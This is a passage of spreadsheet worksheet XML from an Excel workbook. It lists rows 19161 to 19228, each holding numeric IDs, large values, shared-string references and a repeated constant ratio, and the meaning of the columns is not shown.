        <v>1.0</v>
      </c>
      <c r="E19161" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19161" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19162" ht="15.75" customHeight="1">
      <c r="A19162" s="1">
        <v>6511.0</v>
      </c>
      <c r="B19162" s="2">
        <v>4.8759021E7</v>
      </c>
      <c r="C19162" s="2" t="s">
        <v>18468</v>
      </c>
      <c r="D19162" s="2">
        <v>1.0</v>
      </c>
      <c r="E19162" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19162" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19163" ht="15.75" customHeight="1">
      <c r="A19163" s="1">
        <v>6548.0</v>
      </c>
      <c r="B19163" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C19163" s="2" t="s">
        <v>18469</v>
      </c>
      <c r="D19163" s="2">
        <v>1.0</v>
      </c>
      <c r="E19163" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19163" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19164" ht="15.75" customHeight="1">
      <c r="A19164" s="1">
        <v>6659.0</v>
      </c>
      <c r="B19164" s="2">
        <v>4.9100734E7</v>
      </c>
      <c r="C19164" s="2" t="s">
        <v>18470</v>
      </c>
      <c r="D19164" s="2">
        <v>1.0</v>
      </c>
      <c r="E19164" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19164" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19165" ht="15.75" customHeight="1">
      <c r="A19165" s="1">
        <v>6862.0</v>
      </c>
      <c r="B19165" s="2">
        <v>4.9678188E7</v>
      </c>
      <c r="C19165" s="2" t="s">
        <v>18471</v>
      </c>
      <c r="D19165" s="2">
        <v>1.0</v>
      </c>
      <c r="E19165" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19165" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19166" ht="15.75" customHeight="1">
      <c r="A19166" s="1">
        <v>6908.0</v>
      </c>
      <c r="B19166" s="2">
        <v>4.9822224E7</v>
      </c>
      <c r="C19166" s="2" t="s">
        <v>18472</v>
      </c>
      <c r="D19166" s="2">
        <v>1.0</v>
      </c>
      <c r="E19166" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19166" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19167" ht="15.75" customHeight="1">
      <c r="A19167" s="1">
        <v>7010.0</v>
      </c>
      <c r="B19167" s="2">
        <v>5.0091499E7</v>
      </c>
      <c r="C19167" s="2" t="s">
        <v>18473</v>
      </c>
      <c r="D19167" s="2">
        <v>1.0</v>
      </c>
      <c r="E19167" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19167" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19168" ht="15.75" customHeight="1">
      <c r="A19168" s="1">
        <v>7101.0</v>
      </c>
      <c r="B19168" s="2">
        <v>5.0344799E7</v>
      </c>
      <c r="C19168" s="2" t="s">
        <v>18474</v>
      </c>
      <c r="D19168" s="2">
        <v>1.0</v>
      </c>
      <c r="E19168" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19168" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19169" ht="15.75" customHeight="1">
      <c r="A19169" s="1">
        <v>7396.0</v>
      </c>
      <c r="B19169" s="2">
        <v>5.1100805E7</v>
      </c>
      <c r="C19169" s="2" t="s">
        <v>18475</v>
      </c>
      <c r="D19169" s="2">
        <v>1.0</v>
      </c>
      <c r="E19169" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19169" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19170" ht="15.75" customHeight="1">
      <c r="A19170" s="1">
        <v>7431.0</v>
      </c>
      <c r="B19170" s="2">
        <v>5.1181597E7</v>
      </c>
      <c r="C19170" s="2" t="s">
        <v>18476</v>
      </c>
      <c r="D19170" s="2">
        <v>1.0</v>
      </c>
      <c r="E19170" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19170" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19171" ht="15.75" customHeight="1">
      <c r="A19171" s="1">
        <v>7687.0</v>
      </c>
      <c r="B19171" s="2">
        <v>5.1945127E7</v>
      </c>
      <c r="C19171" s="2" t="s">
        <v>18477</v>
      </c>
      <c r="D19171" s="2">
        <v>1.0</v>
      </c>
      <c r="E19171" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19171" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19172" ht="15.75" customHeight="1">
      <c r="A19172" s="1">
        <v>7830.0</v>
      </c>
      <c r="B19172" s="2">
        <v>5.2312676E7</v>
      </c>
      <c r="C19172" s="2" t="s">
        <v>18478</v>
      </c>
      <c r="D19172" s="2">
        <v>1.0</v>
      </c>
      <c r="E19172" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19172" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19173" ht="15.75" customHeight="1">
      <c r="A19173" s="1">
        <v>7993.0</v>
      </c>
      <c r="B19173" s="2">
        <v>5.2767935E7</v>
      </c>
      <c r="C19173" s="2" t="s">
        <v>18479</v>
      </c>
      <c r="D19173" s="2">
        <v>1.0</v>
      </c>
      <c r="E19173" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19173" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19174" ht="15.75" customHeight="1">
      <c r="A19174" s="1">
        <v>8138.0</v>
      </c>
      <c r="B19174" s="2">
        <v>5.3138067E7</v>
      </c>
      <c r="C19174" s="2" t="s">
        <v>18480</v>
      </c>
      <c r="D19174" s="2">
        <v>1.0</v>
      </c>
      <c r="E19174" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19174" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19175" ht="15.75" customHeight="1">
      <c r="A19175" s="1">
        <v>8291.0</v>
      </c>
      <c r="B19175" s="2">
        <v>5.3524032E7</v>
      </c>
      <c r="C19175" s="2" t="s">
        <v>18481</v>
      </c>
      <c r="D19175" s="2">
        <v>1.0</v>
      </c>
      <c r="E19175" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19175" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19176" ht="15.75" customHeight="1">
      <c r="A19176" s="1">
        <v>8555.0</v>
      </c>
      <c r="B19176" s="2">
        <v>5.4162833E7</v>
      </c>
      <c r="C19176" s="2" t="s">
        <v>18482</v>
      </c>
      <c r="D19176" s="2">
        <v>1.0</v>
      </c>
      <c r="E19176" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19176" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19177" ht="15.75" customHeight="1">
      <c r="A19177" s="1">
        <v>8902.0</v>
      </c>
      <c r="B19177" s="2">
        <v>5.4794797E7</v>
      </c>
      <c r="C19177" s="2" t="s">
        <v>18483</v>
      </c>
      <c r="D19177" s="2">
        <v>1.0</v>
      </c>
      <c r="E19177" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19177" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19178" ht="15.75" customHeight="1">
      <c r="A19178" s="1">
        <v>9054.0</v>
      </c>
      <c r="B19178" s="2">
        <v>5.5091101E7</v>
      </c>
      <c r="C19178" s="2" t="s">
        <v>18484</v>
      </c>
      <c r="D19178" s="2">
        <v>1.0</v>
      </c>
      <c r="E19178" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19178" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19179" ht="15.75" customHeight="1">
      <c r="A19179" s="1">
        <v>9129.0</v>
      </c>
      <c r="B19179" s="2">
        <v>5.5229632E7</v>
      </c>
      <c r="C19179" s="2" t="s">
        <v>18485</v>
      </c>
      <c r="D19179" s="2">
        <v>1.0</v>
      </c>
      <c r="E19179" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19179" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19180" ht="15.75" customHeight="1">
      <c r="A19180" s="1">
        <v>9216.0</v>
      </c>
      <c r="B19180" s="2">
        <v>5.5429238E7</v>
      </c>
      <c r="C19180" s="2" t="s">
        <v>18486</v>
      </c>
      <c r="D19180" s="2">
        <v>1.0</v>
      </c>
      <c r="E19180" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19180" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19181" ht="15.75" customHeight="1">
      <c r="A19181" s="1">
        <v>9388.0</v>
      </c>
      <c r="B19181" s="2">
        <v>5.5743421E7</v>
      </c>
      <c r="C19181" s="2" t="s">
        <v>18487</v>
      </c>
      <c r="D19181" s="2">
        <v>1.0</v>
      </c>
      <c r="E19181" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19181" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19182" ht="15.75" customHeight="1">
      <c r="A19182" s="1">
        <v>9406.0</v>
      </c>
      <c r="B19182" s="2">
        <v>5.576675E7</v>
      </c>
      <c r="C19182" s="2" t="s">
        <v>18488</v>
      </c>
      <c r="D19182" s="2">
        <v>1.0</v>
      </c>
      <c r="E19182" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19182" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19183" ht="15.75" customHeight="1">
      <c r="A19183" s="1">
        <v>9408.0</v>
      </c>
      <c r="B19183" s="2">
        <v>5.5773154E7</v>
      </c>
      <c r="C19183" s="2" t="s">
        <v>18489</v>
      </c>
      <c r="D19183" s="2">
        <v>1.0</v>
      </c>
      <c r="E19183" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19183" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19184" ht="15.75" customHeight="1">
      <c r="A19184" s="1">
        <v>9454.0</v>
      </c>
      <c r="B19184" s="2">
        <v>5.5844044E7</v>
      </c>
      <c r="C19184" s="2" t="s">
        <v>18490</v>
      </c>
      <c r="D19184" s="2">
        <v>1.0</v>
      </c>
      <c r="E19184" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19184" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19185" ht="15.75" customHeight="1">
      <c r="A19185" s="1">
        <v>10280.0</v>
      </c>
      <c r="B19185" s="2">
        <v>5.7628197E7</v>
      </c>
      <c r="C19185" s="2" t="s">
        <v>18491</v>
      </c>
      <c r="D19185" s="2">
        <v>1.0</v>
      </c>
      <c r="E19185" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19185" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19186" ht="15.75" customHeight="1">
      <c r="A19186" s="1">
        <v>10301.0</v>
      </c>
      <c r="B19186" s="2">
        <v>5.7667674E7</v>
      </c>
      <c r="C19186" s="2" t="s">
        <v>18492</v>
      </c>
      <c r="D19186" s="2">
        <v>1.0</v>
      </c>
      <c r="E19186" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19186" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19187" ht="15.75" customHeight="1">
      <c r="A19187" s="1">
        <v>10317.0</v>
      </c>
      <c r="B19187" s="2">
        <v>5.769313E7</v>
      </c>
      <c r="C19187" s="2" t="s">
        <v>18493</v>
      </c>
      <c r="D19187" s="2">
        <v>1.0</v>
      </c>
      <c r="E19187" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19187" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19188" ht="15.75" customHeight="1">
      <c r="A19188" s="1">
        <v>10372.0</v>
      </c>
      <c r="B19188" s="2">
        <v>7946244.0</v>
      </c>
      <c r="C19188" s="2" t="s">
        <v>18494</v>
      </c>
      <c r="D19188" s="2">
        <v>1.0</v>
      </c>
      <c r="E19188" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19188" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19189" ht="15.75" customHeight="1">
      <c r="A19189" s="1">
        <v>10401.0</v>
      </c>
      <c r="B19189" s="2">
        <v>9520964.0</v>
      </c>
      <c r="C19189" s="2" t="s">
        <v>18495</v>
      </c>
      <c r="D19189" s="2">
        <v>1.0</v>
      </c>
      <c r="E19189" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19189" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19190" ht="15.75" customHeight="1">
      <c r="A19190" s="1">
        <v>10443.0</v>
      </c>
      <c r="B19190" s="2">
        <v>1.0450338E7</v>
      </c>
      <c r="C19190" s="2" t="s">
        <v>18496</v>
      </c>
      <c r="D19190" s="2">
        <v>1.0</v>
      </c>
      <c r="E19190" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19190" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19191" ht="15.75" customHeight="1">
      <c r="A19191" s="1">
        <v>10565.0</v>
      </c>
      <c r="B19191" s="2">
        <v>1.2879442E7</v>
      </c>
      <c r="C19191" s="2" t="s">
        <v>18497</v>
      </c>
      <c r="D19191" s="2">
        <v>1.0</v>
      </c>
      <c r="E19191" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19191" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19192" ht="15.75" customHeight="1">
      <c r="A19192" s="1">
        <v>10789.0</v>
      </c>
      <c r="B19192" s="2">
        <v>1.5698585E7</v>
      </c>
      <c r="C19192" s="2" t="s">
        <v>18498</v>
      </c>
      <c r="D19192" s="2">
        <v>1.0</v>
      </c>
      <c r="E19192" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19192" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19193" ht="15.75" customHeight="1">
      <c r="A19193" s="1">
        <v>10879.0</v>
      </c>
      <c r="B19193" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C19193" s="2" t="s">
        <v>18499</v>
      </c>
      <c r="D19193" s="2">
        <v>1.0</v>
      </c>
      <c r="E19193" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19193" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19194" ht="15.75" customHeight="1">
      <c r="A19194" s="1">
        <v>10913.0</v>
      </c>
      <c r="B19194" s="2">
        <v>1.6697248E7</v>
      </c>
      <c r="C19194" s="2" t="s">
        <v>18500</v>
      </c>
      <c r="D19194" s="2">
        <v>1.0</v>
      </c>
      <c r="E19194" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19194" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19195" ht="15.75" customHeight="1">
      <c r="A19195" s="1">
        <v>11380.0</v>
      </c>
      <c r="B19195" s="2">
        <v>2.1420184E7</v>
      </c>
      <c r="C19195" s="2" t="s">
        <v>18501</v>
      </c>
      <c r="D19195" s="2">
        <v>1.0</v>
      </c>
      <c r="E19195" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19195" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19196" ht="15.75" customHeight="1">
      <c r="A19196" s="1">
        <v>11628.0</v>
      </c>
      <c r="B19196" s="2">
        <v>2.3165502E7</v>
      </c>
      <c r="C19196" s="2" t="s">
        <v>18502</v>
      </c>
      <c r="D19196" s="2">
        <v>1.0</v>
      </c>
      <c r="E19196" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19196" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19197" ht="15.75" customHeight="1">
      <c r="A19197" s="1">
        <v>11686.0</v>
      </c>
      <c r="B19197" s="2">
        <v>2.3447561E7</v>
      </c>
      <c r="C19197" s="2" t="s">
        <v>18503</v>
      </c>
      <c r="D19197" s="2">
        <v>1.0</v>
      </c>
      <c r="E19197" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19197" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19198" ht="15.75" customHeight="1">
      <c r="A19198" s="1">
        <v>11969.0</v>
      </c>
      <c r="B19198" s="2">
        <v>2.5717867E7</v>
      </c>
      <c r="C19198" s="2" t="s">
        <v>18504</v>
      </c>
      <c r="D19198" s="2">
        <v>1.0</v>
      </c>
      <c r="E19198" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19198" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19199" ht="15.75" customHeight="1">
      <c r="A19199" s="1">
        <v>12017.0</v>
      </c>
      <c r="B19199" s="2">
        <v>2.6051383E7</v>
      </c>
      <c r="C19199" s="2" t="s">
        <v>18505</v>
      </c>
      <c r="D19199" s="2">
        <v>1.0</v>
      </c>
      <c r="E19199" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19199" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19200" ht="15.75" customHeight="1">
      <c r="A19200" s="1">
        <v>12086.0</v>
      </c>
      <c r="B19200" s="2">
        <v>2.670415E7</v>
      </c>
      <c r="C19200" s="2" t="s">
        <v>18506</v>
      </c>
      <c r="D19200" s="2">
        <v>1.0</v>
      </c>
      <c r="E19200" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19200" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19201" ht="15.75" customHeight="1">
      <c r="A19201" s="1">
        <v>12377.0</v>
      </c>
      <c r="B19201" s="2">
        <v>2.882754E7</v>
      </c>
      <c r="C19201" s="2" t="s">
        <v>18507</v>
      </c>
      <c r="D19201" s="2">
        <v>1.0</v>
      </c>
      <c r="E19201" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19201" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19202" ht="15.75" customHeight="1">
      <c r="A19202" s="1">
        <v>12418.0</v>
      </c>
      <c r="B19202" s="2">
        <v>2.9118858E7</v>
      </c>
      <c r="C19202" s="2" t="s">
        <v>18508</v>
      </c>
      <c r="D19202" s="2">
        <v>1.0</v>
      </c>
      <c r="E19202" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19202" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19203" ht="15.75" customHeight="1">
      <c r="A19203" s="1">
        <v>12504.0</v>
      </c>
      <c r="B19203" s="2">
        <v>2.9638773E7</v>
      </c>
      <c r="C19203" s="2" t="s">
        <v>18509</v>
      </c>
      <c r="D19203" s="2">
        <v>1.0</v>
      </c>
      <c r="E19203" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19203" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19204" ht="15.75" customHeight="1">
      <c r="A19204" s="1">
        <v>12651.0</v>
      </c>
      <c r="B19204" s="2">
        <v>3.039396E7</v>
      </c>
      <c r="C19204" s="2" t="s">
        <v>18510</v>
      </c>
      <c r="D19204" s="2">
        <v>1.0</v>
      </c>
      <c r="E19204" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19204" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19205" ht="15.75" customHeight="1">
      <c r="A19205" s="1">
        <v>12683.0</v>
      </c>
      <c r="B19205" s="2">
        <v>3.0625967E7</v>
      </c>
      <c r="C19205" s="2" t="s">
        <v>18511</v>
      </c>
      <c r="D19205" s="2">
        <v>1.0</v>
      </c>
      <c r="E19205" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19205" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19206" ht="15.75" customHeight="1">
      <c r="A19206" s="1">
        <v>12761.0</v>
      </c>
      <c r="B19206" s="2">
        <v>3.116679E7</v>
      </c>
      <c r="C19206" s="2" t="s">
        <v>18512</v>
      </c>
      <c r="D19206" s="2">
        <v>1.0</v>
      </c>
      <c r="E19206" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19206" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19207" ht="15.75" customHeight="1">
      <c r="A19207" s="1">
        <v>12830.0</v>
      </c>
      <c r="B19207" s="2">
        <v>3.1645804E7</v>
      </c>
      <c r="C19207" s="2" t="s">
        <v>18513</v>
      </c>
      <c r="D19207" s="2">
        <v>1.0</v>
      </c>
      <c r="E19207" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19207" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19208" ht="15.75" customHeight="1">
      <c r="A19208" s="1">
        <v>12870.0</v>
      </c>
      <c r="B19208" s="2">
        <v>3.1917971E7</v>
      </c>
      <c r="C19208" s="2" t="s">
        <v>18514</v>
      </c>
      <c r="D19208" s="2">
        <v>1.0</v>
      </c>
      <c r="E19208" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19208" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19209" ht="15.75" customHeight="1">
      <c r="A19209" s="1">
        <v>13128.0</v>
      </c>
      <c r="B19209" s="2">
        <v>3.3656602E7</v>
      </c>
      <c r="C19209" s="2" t="s">
        <v>18515</v>
      </c>
      <c r="D19209" s="2">
        <v>1.0</v>
      </c>
      <c r="E19209" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19209" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19210" ht="15.75" customHeight="1">
      <c r="A19210" s="1">
        <v>13142.0</v>
      </c>
      <c r="B19210" s="2">
        <v>3.3738579E7</v>
      </c>
      <c r="C19210" s="2" t="s">
        <v>18516</v>
      </c>
      <c r="D19210" s="2">
        <v>1.0</v>
      </c>
      <c r="E19210" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19210" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19211" ht="15.75" customHeight="1">
      <c r="A19211" s="1">
        <v>13333.0</v>
      </c>
      <c r="B19211" s="2">
        <v>3.4649638E7</v>
      </c>
      <c r="C19211" s="2" t="s">
        <v>18517</v>
      </c>
      <c r="D19211" s="2">
        <v>1.0</v>
      </c>
      <c r="E19211" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19211" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19212" ht="15.75" customHeight="1">
      <c r="A19212" s="1">
        <v>13444.0</v>
      </c>
      <c r="B19212" s="2">
        <v>3.5157663E7</v>
      </c>
      <c r="C19212" s="2" t="s">
        <v>18518</v>
      </c>
      <c r="D19212" s="2">
        <v>1.0</v>
      </c>
      <c r="E19212" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19212" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19213" ht="15.75" customHeight="1">
      <c r="A19213" s="1">
        <v>13645.0</v>
      </c>
      <c r="B19213" s="2">
        <v>3.5919328E7</v>
      </c>
      <c r="C19213" s="2" t="s">
        <v>18519</v>
      </c>
      <c r="D19213" s="2">
        <v>1.0</v>
      </c>
      <c r="E19213" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19213" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19214" ht="15.75" customHeight="1">
      <c r="A19214" s="1">
        <v>13784.0</v>
      </c>
      <c r="B19214" s="2">
        <v>3.6561669E7</v>
      </c>
      <c r="C19214" s="2" t="s">
        <v>18520</v>
      </c>
      <c r="D19214" s="2">
        <v>1.0</v>
      </c>
      <c r="E19214" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19214" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19215" ht="15.75" customHeight="1">
      <c r="A19215" s="1">
        <v>14146.0</v>
      </c>
      <c r="B19215" s="2">
        <v>3.7956441E7</v>
      </c>
      <c r="C19215" s="2" t="s">
        <v>18521</v>
      </c>
      <c r="D19215" s="2">
        <v>1.0</v>
      </c>
      <c r="E19215" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19215" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19216" ht="15.75" customHeight="1">
      <c r="A19216" s="1">
        <v>14445.0</v>
      </c>
      <c r="B19216" s="2">
        <v>3.9355347E7</v>
      </c>
      <c r="C19216" s="2" t="s">
        <v>18522</v>
      </c>
      <c r="D19216" s="2">
        <v>1.0</v>
      </c>
      <c r="E19216" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19216" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19217" ht="15.75" customHeight="1">
      <c r="A19217" s="1">
        <v>14517.0</v>
      </c>
      <c r="B19217" s="2">
        <v>3.9760199E7</v>
      </c>
      <c r="C19217" s="2" t="s">
        <v>18523</v>
      </c>
      <c r="D19217" s="2">
        <v>1.0</v>
      </c>
      <c r="E19217" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19217" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19218" ht="15.75" customHeight="1">
      <c r="A19218" s="1">
        <v>15449.0</v>
      </c>
      <c r="B19218" s="2">
        <v>4.3041595E7</v>
      </c>
      <c r="C19218" s="2" t="s">
        <v>18524</v>
      </c>
      <c r="D19218" s="2">
        <v>1.0</v>
      </c>
      <c r="E19218" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19218" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19219" ht="15.75" customHeight="1">
      <c r="A19219" s="1">
        <v>15566.0</v>
      </c>
      <c r="B19219" s="2">
        <v>4.3429621E7</v>
      </c>
      <c r="C19219" s="2" t="s">
        <v>18525</v>
      </c>
      <c r="D19219" s="2">
        <v>1.0</v>
      </c>
      <c r="E19219" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19219" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19220" ht="15.75" customHeight="1">
      <c r="A19220" s="1">
        <v>15650.0</v>
      </c>
      <c r="B19220" s="2">
        <v>4.3620106E7</v>
      </c>
      <c r="C19220" s="2" t="s">
        <v>18526</v>
      </c>
      <c r="D19220" s="2">
        <v>1.0</v>
      </c>
      <c r="E19220" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19220" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19221" ht="15.75" customHeight="1">
      <c r="A19221" s="1">
        <v>16298.0</v>
      </c>
      <c r="B19221" s="2">
        <v>4.5901555E7</v>
      </c>
      <c r="C19221" s="2" t="s">
        <v>18527</v>
      </c>
      <c r="D19221" s="2">
        <v>1.0</v>
      </c>
      <c r="E19221" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19221" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19222" ht="15.75" customHeight="1">
      <c r="A19222" s="1">
        <v>17265.0</v>
      </c>
      <c r="B19222" s="2">
        <v>4.9156308E7</v>
      </c>
      <c r="C19222" s="2" t="s">
        <v>18528</v>
      </c>
      <c r="D19222" s="2">
        <v>1.0</v>
      </c>
      <c r="E19222" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19222" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19223" ht="15.75" customHeight="1">
      <c r="A19223" s="1">
        <v>18192.0</v>
      </c>
      <c r="B19223" s="2">
        <v>5.2028029E7</v>
      </c>
      <c r="C19223" s="2" t="s">
        <v>18529</v>
      </c>
      <c r="D19223" s="2">
        <v>1.0</v>
      </c>
      <c r="E19223" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19223" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19224" ht="15.75" customHeight="1">
      <c r="A19224" s="1">
        <v>18248.0</v>
      </c>
      <c r="B19224" s="2">
        <v>5.2152864E7</v>
      </c>
      <c r="C19224" s="2" t="s">
        <v>18530</v>
      </c>
      <c r="D19224" s="2">
        <v>1.0</v>
      </c>
      <c r="E19224" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19224" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19225" ht="15.75" customHeight="1">
      <c r="A19225" s="1">
        <v>18250.0</v>
      </c>
      <c r="B19225" s="2">
        <v>5.2154938E7</v>
      </c>
      <c r="C19225" s="2" t="s">
        <v>18531</v>
      </c>
      <c r="D19225" s="2">
        <v>1.0</v>
      </c>
      <c r="E19225" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19225" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19226" ht="15.75" customHeight="1">
      <c r="A19226" s="1">
        <v>18345.0</v>
      </c>
      <c r="B19226" s="2">
        <v>5.2477419E7</v>
      </c>
      <c r="C19226" s="2" t="s">
        <v>18532</v>
      </c>
      <c r="D19226" s="2">
        <v>1.0</v>
      </c>
      <c r="E19226" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19226" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19227" ht="15.75" customHeight="1">
      <c r="A19227" s="1">
        <v>19131.0</v>
      </c>
      <c r="B19227" s="2">
        <v>5.4778752E7</v>
      </c>
      <c r="C19227" s="2" t="s">
        <v>18533</v>
      </c>
      <c r="D19227" s="2">
        <v>1.0</v>
      </c>
      <c r="E19227" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F19227" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="19228" ht="15.75" customHeight="1">
      <c r="A19228" s="1">
        <v>19134.0</v>
      </c>
      <c r="B19228" s="2">
        <v>5.4795107E7</v>
      </c>
      <c r="C19228" s="2" t="s">
        <v>18534</v>
      </c>
      <c r="D19228" s="2">
